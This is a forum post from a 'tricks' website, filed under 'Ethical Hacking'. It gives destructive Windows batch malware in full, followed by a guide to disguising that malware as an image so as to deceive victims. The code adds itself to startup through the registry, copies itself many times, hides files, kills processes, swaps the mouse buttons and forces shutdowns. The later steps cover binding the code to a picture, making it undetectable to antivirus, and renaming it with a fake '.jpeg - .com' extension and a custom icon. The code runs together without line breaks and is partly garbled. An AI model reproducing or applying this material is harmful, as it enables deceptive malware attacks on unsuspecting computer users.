Current time: 03-29-2024, 06:49 PM
facebook twitter youtube google+ feedburner
  • http://tricksduniya.com
  • Welcome the world of CRYPTO CURRENCY
  • visit daily
  • For Whatsapp Official Group Contact Our Modrate
  • Mr. Paramjit Singh = 08295205000
  • Mr. Mack = 08295943112

Tricks Duniya -ONLINE SHOPPING GUIDE, MOBILE TRICKS, ANDROID TRICKS, HACKING > RULEBRAKER ZONE > Ethical Hacking > How to Hide a Virus inside of your Picture? >

Replies: 0    views: 467
Thread Rating:
  • 0 Vote(s) - 0 Average
 How to Hide a Virus inside of your Picture?
Download App
08-25-2015, 01:21 AM,
Mesajlar : 454
Konular:
Rep Puanı: 2

How to Hide a Virus inside of your Picture?

Creating a dangerous virus using notepad

Warning: This virus has very very dangerous properties :-1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer

copy this code into notepad and save as tricksduniya.bat (while saving select all files instead of text ).
Here is the Code:

@Echo offcolor 4title 4title R.I.Pstartstartstartstart calccopy %0%Systemroot%\Tricksduniya > nulregadd HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Tricksduniya /t REG_SZ/d%systemroot%\Tricksduniya.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Tricksduniya.batAttrib +r +hRUNDLL32 USER32.DLL.SwapMouseButtonstart calcclstskill msnmsgrtskill LimeWiretskill iexploretskill NMainstartclscd %userprofile%\desktopcopy Tricksduniya.bat R.I.P.batcopy Tricksduniya.bat R.I.P.jpgcopy Tricksduniya.bat R.I.P.txtcopy Tricksduniya.bat R.I.P.execopy Tricksduniya.bat R.I.P.movcopy Tricksduniya.bat FixVirus.batcd%userprofile%My Documentscopy Tricksduniya.bat R.I.P.batcopy Tricksduniya.bat R.I.P.jpgcopy Tricksduniya.bat R.I.P.txtcopy Tricksduniya.bat R.I.P.execopy Tricksduniya.bat R.I.P.movcopy Tricksduniya.bat FixVirus.batstartstart calcclsmsg * R.I.Pmsg * R.I.Pshutdown -r -t 10 -c “VIRUS DETECTED”startstarttime 12:00:R.I.Pcd%usernameprofile%\desktopcopy Tricksduniya.bat %random%.batgoto RIP

You are done making virus
Notes: PLEASE DON’T TEST IT ON YOUR COMPUTER

Hide virus in image file
I. Download the tools
1.Easy Binder.
2. Image to Icon Converter.
3. Icon Changer.

II. Creating an Icon:
1. Run Image to Icon Converter from downloaded files.
Select the image in which you want to hide virus and then open this image in Image to icon converter. (Use image with size within 128 pixels. You can resize image using IrfanView. In IrfanView, Press Ctrl+R).- Now, click on 128 X 128 checkbox at bottom. Click on Size button and hit on 128 X 128.

2. Adjust image crop, if necessary. Hit on Make. Go to File -> Save and save it on your desktop for later use. Let this icon be “Icon.ico”.

III. Steps to hide virus:
1. Now, run Easy Binder.exe

2. Click “+” button present at bottom pane, browse to your virus file named as Tricksduniya.bat file and add it. Again using same “+” button, add the image in which you want to hide virus.

3. Now, click on “Settings” present at top

4. Now, click on button next to “Select an Icon” and browse to the “Icon.ico” file created in Step II.

5. Click on button next to “Set Output File” and enter the path where you want to save binded file. Hit on “File’s” tab in upper pane and then click on “Bind files”. Let this final file be “Binded.exe”.

NOTE: Now you got the virus file attached with an image file named “Binded.exe” and it will be detected by Anti virus, so you have to make it fully undetectable

IV. Changing Extension and Icon:

1. After you are done with making your virus file fully undetectable Open My Computer and go to Tools -> Folder Options. Click on View tab and uncheck “Hide extension for known file types” and hit on OK.

2. Now, rename our “Binded.exe” to say “Tricksduniya.jpeg-Tricksduniya.com” The format should be:
Imagename.jpeg – Any name.com

3. Now, install Icon Changer on your computer obtained from downloaded files. Right click on our binded file and hit on “Change Icon”. Hit on Folder icon next to “Search icons”

4. In the dialog box, click on Desktop and hit OK. Now, our Icon.ico will be displayed. Select it and hit on “Set”.

Now You will see your final virus

Note: Usually, .exe extension creates a doubt in victim’s mind. So, we are using.com extension to fool victim. Usually, people don’t have knowledge of .com extension and out of “Tricksduniya.jpeg-Tricksduniya.com” they consider “Tricksduniya.jpeg” as image name with.jpeg as image extension. This fools the victim.

Links:
1.Easy Binder
Link: http://easy-binder.software.informer.com/
2. Image to Icon Converter
Link: http://m.en.softonic.com/app/image-2-icon-converter
3. Icon Changer
Link: http://m.en.softonic.com/app/iconchanger
08-25-2015, 01:21 AM
« Next Oldest | Next Newest »